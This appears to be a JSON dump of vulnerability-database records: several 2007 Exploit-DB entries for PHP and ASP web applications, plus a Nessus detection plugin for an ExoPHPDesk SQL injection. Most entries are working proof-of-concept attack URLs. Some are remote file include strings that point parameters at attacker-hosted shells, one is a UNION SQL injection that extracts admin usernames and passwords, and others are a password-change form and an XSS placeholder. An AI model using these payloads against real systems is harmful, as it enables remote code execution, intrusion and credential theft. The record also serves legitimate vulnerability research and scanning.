Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "PHPMyRing <= 4.1.3b fichier Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0679"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3238", "href": "https://www.exploit-db.com/exploits/3238/", "sourceData": "*******************************************************************************\n# Title : PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability\n# Author : ajann\n# Contact : :(\n# S.Page : http://www.microniko.net/phpmyring/\n# $$ : Free\n\n*******************************************************************************\n[[ERROR]]]\n..\n...\n.....\n<?\ninclude ($fichier.\".php\");\n?>\n..\n...\n.....\n\n[[ERROR]]]\n\n\n[[RFI]]]\n\nhttp://[target]/[path]//lang/leslangues.php?fichier=[SHELL]\n\nExample:\n\n//lang/leslangues.php?fichier=http://[target]/[path]/shell.x\n\n[[/RFI]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3238/"}, {"lastseen": "2016-01-31T18:02:39", "description": "Cerulean Portal System 0.7b Remote File Include Vulnerability. CVE-2007-0684. 
Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Cerulean Portal System 0.7b Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0684"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3243", "href": "https://www.exploit-db.com/exploits/3243/", "sourceData": "-----------------------------------------------\n\nCerulean Portal System (phpbb_root_path) Remote File Include Exploit\n\n-----------------------------------------------\n\nAuthor: xoron\n\nxoron.biz - xoron.info\n\n-----------------------------------------------\n\nCode: \n\ninclude ($phpbb_root_path . 'portal/config.' . $phpEx);\n\n-----------------------------------------------\n\nPOC:\n\nwww.[target].com/[script_pat]/portal/portal.php?phpbb_root_path=http://evilscripts?\n\n-----------------------------------------------\n\nExploit: Exploit coded by xoron..!\n\nHTML\nwww.xoron.info/bugs/ceruleanportalsystem-html.txt\n\nPERL\nwww.xoron.info/bugs/ceruleanportalsystem-perl.txt\n\n-----------------------------------------------\n\ndownload: http://sourceforge.net/projects/cerulean/\n\n-----------------------------------------------\n\nTesekkurler: pang0, chaos, can bjorn\n\nThanx: str0ke, kacper\n\nxoron gider izi kalir, selametle.\n\nkaybetmenin tiryakisi bir cocuk xoron.\n\nAdimizi altin harflerle yazdik.\n\n-----------------------------------------------\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3243/"}, {"lastseen": "2016-01-31T18:01:44", "description": "Phpbb Tweaked <= 3 (phpbb_root_path) Remote Inclusion Vulnerability. CVE-2007-0680. 
Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Phpbb Tweaked <= 3 phpbb_root_path Remote Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0680"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3235", "href": "https://www.exploit-db.com/exploits/3235/", "sourceData": "-----------------------------------------------\n\nPhpbb Tweaked (phpbb_root_path) Remote File Include Exploit\n\n-----------------------------------------------\n\nAuthor: xoron\n\nxoron.biz - xoron.info\n\n-----------------------------------------------\n\nCode:\ninclude_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );\n\n-----------------------------------------------\n\nPOC:\n\nwww.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?\n\n-----------------------------------------------\n\nExploit:\n\nwww.xoron.info/bugs/phpbbtweaked.txt\n\n-----------------------------------------------\n\ndownload: http://sourceforge.net/projects/phpbbtweaked/\n\n-----------------------------------------------\n\nTesekkurler: pang0, chaos, can bjorn\nThanx: str0ke, kacper\n \n-----------------------------------------------\n\nxoron gider izi kalir, selametle.\n\nkaybetmenin tiryakisi bir cocuk xoron.\n\nAdimizi altin harflerle yazdik.\n\n-----------------------------------------------\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3235/"}, {"lastseen": "2016-01-31T18:01:58", "description": "Cadre PHP Framework Remote File Include Vulnerability. CVE-2007-0677. 
Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Cadre PHP Framework Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0677"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3237", "href": "https://www.exploit-db.com/exploits/3237/", "sourceData": "____________________ ___ ___ ________\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\\n | __)_ / \\ \\// ~ \\/ | \\\n | \\\\ \\___\\ Y / | \\\n/_______ / \\______ /\\___|_ /\\_______ /\n \\/ \\/ \\/ \\/ .OR.ID\nECHO_ADV_63$2007\n\n------------------------------------------------------------------------------------\n[ECHO_ADV_63$2007] Cadre remote file inclusion\n------------------------------------------------------------------------------------\n\nAuthor\t\t: Ahmad Muammar W.K (a.k.a) y3dips\nDate Found\t: January, 31st 2007\nLocation\t: Indonesia, Jakarta\nweb\t\t: http://echo.or.id/adv/adv63-y3dips-2007.txt\nCritical Lvl\t: Critical\n------------------------------------------------------------------------------------\n\n\nAffected software description:\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nApplication : Cadre\nURL : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/\nDownload-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz\n\nDescription : Cadre is a PHP framework for developing large business applications. \n\t\tIt currently supports PostgreSQL as the database back end (although \n\t\tthis is extensible). We (Cronosys, LLC) have invested two and a half \n\t\tyears in this framework and applications based on this framework.\n\n---------------------------------------------------------------------------\n\nVulnerability:\n~~~~~~~~~~\n\n\t---------------class.Quick_Config_Browser.php --------------------\n\t...\n\tinclude_once($GLOBALS[config][framework_path] . 
\"class.Browser.php\");\n\t...\n\t------------------------------------------------------------------\n\n\n\tAn attacker can exploit this vulnerability with a simple php injection script.\n\nPoc/Exploit:\n~~~~~~~~\n\nhttp://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?\n\n---------------------------------------------------------------------------\nShoutz:\n~~~\n~ my lovely ana\n~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff\n~ str0ke, waraxe, negative\n~ newbie_hacker@yahoogroups.com\n~ #e-c-h-o @irc.dal.net\n\n---------------------------------------------------------------------------\nContact:\n~~~~\n\n y3dips|| echo|staff || y3dips[at]gmail[dot]com\n Homepage: http://y3dips.echo.or.id/\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3237/"}, {"lastseen": "2016-01-31T18:01:30", "description": "Fullaspsite Asp Hosting Sitesi (tr) SQL Injection Vulnerability. CVE-2007-0678. 
Webapps exploit for asp platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Fullaspsite Asp Hosting Sitesi tr SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0678"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3233", "href": "https://www.exploit-db.com/exploits/3233/", "sourceData": "###############################################################\n#Fullaspsite Asp Hosting (tr) == SQL Injection Vulnerability\n#Author : cl24zy - DrEgHoT - TuF4N\n#Site : www.hacklive.org , www.illegal-attack.org\n#Contact: admin@hacklive.org\n###############################################################\n#Download Link Of Fullaspsite Asp Hosting Sitesi (tr) :\nhttp://www.aspindir.com/Goster/4383\n#Demo : http://aspsiteler.fullaspsite.com/hosting\n\n#Exploit;\n#Admin Nick, Passport;\nhttp://[SITE]/windows.asp?kategori_id=-1%20union+all+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin\n\n\n#Union data Text;\n#Alt Domain : Admin UserName\n#Anl.k Trafik : Admin Password\n\n#Greetz: iLLeGaL-ATTaCK//TiM & HacKLivETeaM\n################################################################\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3233/"}, {"lastseen": "2016-01-31T18:02:12", "description": "Extcalendar <= 2 (profile.php) Remote User Pass Change Exploit. CVE-2007-0681. 
Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Extcalendar <= 2 profile.php Remote User Pass Change Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0681"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3239", "href": "https://www.exploit-db.com/exploits/3239/", "sourceData": "<form name=\"userform\" action=\"http://[target]/register.php\" method=\"post\">\n\t\t<input name=\"step\" type=\"hidden\" value=\"regform\">\n\n\n\t\t<tr>\n\t\t\t<td class='tableh2' colspan='2'>Account Information</td>\n\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Username</td>\n\t\t\t<td class='tableb'>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Password</td>\n\n\t\t\t<td class='tableb'><input type='password' name='password' class='textinput' value=\"\" size='25' maxlength=\"16\">\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Confirm Password</td>\n\t\t\t<td class='tableb'><input type='password' name='password_confirm' class='textinput' value=\"\" size='25' maxlength=\"16\">\n\t\t\t</td>\n\t\t</tr>\n\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>E-mail Address</td>\n\t\t\t<td class='tableb'><input type='text' name='email' class='textinput' value=\"\" size='25'>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableh2' colspan='2'>Other Details</td>\n\t\t</tr>\n\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>First Name</td>\n\t\t\t<td class='tableb'><input type='text' name='firstname' class='textinput' value=\"\" size='25'>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Last Name</td>\n\t\t\t<td class='tableb'><input type='text' name='lastname' class='textinput' value=\"\" size='25'>\n\n\t\t\t</td>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Home page</td>\n\t\t\t<td class='tableb'><input type='text' name='user_website' class='textinput' value=\"\" size='25'>\n\t\t\t</td>\n\t\t<tr>\n\t\t\t<td class='tableb' 
width='160'>Location</td>\n\t\t\t<td class='tableb'><input type='text' name='user_location' class='textinput' value=\"\" size='25'>\n\n\t\t\t</td>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Occupation</td>\n\t\t\t<td class='tableb'><input type='text' name='user_occupation' class='textinput' value=\"\" size='25'>\n\t\t\t</td>\n\t\t</tr>\n\n\t\t<tr>\n\n\t\t\t<td class='tablec' colspan='2' align='center' valign='middle' height='40'>\n\t\t\t\t<input name='submit' type='submit' value=\" Submit my registration \" class='button'>\n\t\t\t</td>\n\t\t</tr>\n<!-- END submit_row -->\n\t</form>\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3239/"}, {"lastseen": "2016-01-31T18:02:32", "description": "Omegaboard <= 1.0beta4 (functions.php) Remote File Include Vuln. CVE-2007-0683. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Omegaboard <= 1.0beta4 functions.php Remote File Include Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0683"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3242", "href": "https://www.exploit-db.com/exploits/3242/", "sourceData": "-----------------------------------------------\n\nOmegaboard v1.0b4 (phpbb_root_path) Remote File Include Exploit\n\n-----------------------------------------------\n\nAuthor: xoron\n\nxoron.biz - xoron.info\n\n-----------------------------------------------\n\nCode: \n\ninclude_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . 
$phpEx );\n\n-----------------------------------------------\n\nPOC:\n\nwww.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?\n\n-----------------------------------------------\n\nExploit: Exploit coded by xoron..!\n\nHTML\nwww.xoron.info/bugs/omegaboard-html.txt\n\nPERL\nwww.xoron.info/bugs/omegaboard-perl.txt\n\n-----------------------------------------------\n\ndownload: http://sourceforge.net/project/showfiles.php?group_id=120703\n\n-----------------------------------------------\n\nTesekkurler: pang0, chaos, can bjorn\n\nThanx: str0ke, kacper\n\nxoron gider izi kalir, selametle.\n\nkaybetmenin tiryakisi bir cocuk xoron.\n\nAdimizi altin harflerle yazdik.\n\n-----------------------------------------------\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3242/"}, {"lastseen": "2016-01-31T18:01:51", "description": "Hailboards 1.2.0 (phpbb_root_path) Remote File Include Vulnerability. CVE-2007-0662. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Hailboards 1.2.0 phpbb_root_path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0662"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3236", "href": "https://www.exploit-db.com/exploits/3236/", "sourceData": "-----------------------------------------------\n\nHailboards v1.2.0 (phpbb_root_path) Remote File Include Exploit\n\n-----------------------------------------------\n\nAuthor: xoron\n\nxoron.biz - xoron.info\n\n-----------------------------------------------\n\nCode:\n\ninclude($phpbb_root_path . 
'includes/bbcode.'.$phpEx);\n\n-----------------------------------------------\n\nPOC:\n\nwww.[target].com/[script_pat]/includes/usercp_viewprofile.php?phpbb_root_path=http://evilscripts?\n\n-----------------------------------------------\n\nExploit:\n\nwww.xoron.info/bugs/hailboards.txt\n\n-----------------------------------------------\n\ndownload: http://hailboards.org/\n\n-----------------------------------------------\n\nTesekkurler: pang0, chaos, can bjorn\n\nThanx: str0ke, kacper\n\nxoron gider izi kalir, selametle.\n\nkaybetmenin tiryakisi bir cocuk xoron.\n\nAdimizi altin harflerle yazdik.\n\n-----------------------------------------------\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3236/"}, {"lastseen": "2016-02-03T10:34:56", "description": "OpenEMR 2.8.2 Import_XML.PHP Remote File Include Vulnerability. CVE-2007-0649. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "OpenEMR 2.8.2 Import_XML.PHP Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0649"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:29556", "href": "https://www.exploit-db.com/exploits/29556/", "sourceData": "source: http://www.securityfocus.com/bid/22346/info\r\n\r\nOpenEMR is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.\r\n\r\nExploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n\r\nThis issue affects version 2.8.2; other versions may also be vulnerable. 
\r\n\r\nhttp://www.example.com/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:HIGH/Au:MULTIPLE_INSTANCES/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29556/"}, {"lastseen": "2016-02-03T10:35:04", "description": "OpenEMR 2.8.2 Login_Frame.PHP Cross-Site Scripting Vulnerability. CVE-2007-0649. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "OpenEMR 2.8.2 Login_Frame.PHP Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0649"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:29557", "href": "https://www.exploit-db.com/exploits/29557/", "sourceData": "source: http://www.securityfocus.com/bid/22348/info\r\n\r\nOpenEMR is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.\r\n\r\nThis issue affects version 2.8.2; other versions may also be vulnerable. \r\n\r\nhttp://www.example.com/openemr/interface/login/login_frame.php?rootdir=[XSS] ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:HIGH/Au:MULTIPLE_INSTANCES/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29557/"}], "nessus": [{"lastseen": "2021-01-20T10:04:25", "description": "The remote host is running Exo PHPDesk, a helpdesk application written\nin PHP. \n\nThe version of Exo PHPDesk on the remote host fails to properly\nsanitize input to the 'id' parameter of the 'faq.php' script before\nusing it in database queries. 
Provided PHP's 'magic_quotes_gpc'\nsetting is disabled, an unauthenticated, remote attacker can leverage\nthis issue to launch SQL injection attacks against the affected\napplication, leading to discovery of sensitive information, attacks\nagainst the underlying database, and the like.", "edition": 24, "published": "2007-02-01T00:00:00", "title": "ExoPHPDesk faq.php id Parameter SQL Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0676"], "modified": "2007-02-01T00:00:00", "cpe": [], "id": "EXOPHPDESK_ID_SQL_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/24267", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24267);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2007-0676\");\n script_bugtraq_id(22338);\n script_xref(name:\"EDB-ID\", value:\"3234\");\n\n script_name(english:\"ExoPHPDesk faq.php id Parameter SQL Injection\");\n script_summary(english:\"Tries to generate a SQL error with Exo PHPDesk\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to SQL\ninjection attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Exo PHPDesk, a helpdesk application written\nin PHP. \n\nThe version of Exo PHPDesk on the remote host fails to properly\nsanitize input to the 'id' parameter of the 'faq.php' script before\nusing it in database queries. 
Provided PHP's 'magic_quotes_gpc'\nsetting is disabled, an unauthenticated, remote attacker can leverage\nthis issue to launch SQL injection attacks against the affected\napplication, leading to discovery of sensitive information, attacks\nagainst the underlying database, and the like.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80, embedded: 0);\nif (!can_host_php(port:port)) exit(0);\n\n# Loop through various directories.\nif (thorough_tests) dirs = list_uniq(make_list(\"/exophpdesk\", \"/exodesk\", \"/helpdesk\", \"/support\", cgi_dirs()));\nelse dirs = make_list(cgi_dirs());\n\nforeach dir (dirs)\n{\n # Try to exploit the flaw.\n magic = rand();\n exploit = string(\"-1' UNION SELECT 0,\", magic, \",0,0,0,0,0--\");\n\n r = http_send_recv3(method:\"GET\",\n 
item:string(\n dir, \"/faq.php?\",\n \"action=&\",\n \"type=view&\",\n \"s=&\",\n \"id=\", urlencode(str:exploit)\n ), port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # it looks like ExoPHPDesk and...\n \">Powered by ExoPHPDesk\" >< res &&\n # it uses our magic for the FAQ title.\n string(\">F.A.Q. Title: \", magic, \"</\") >< res\n )\n {\n security_warning(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}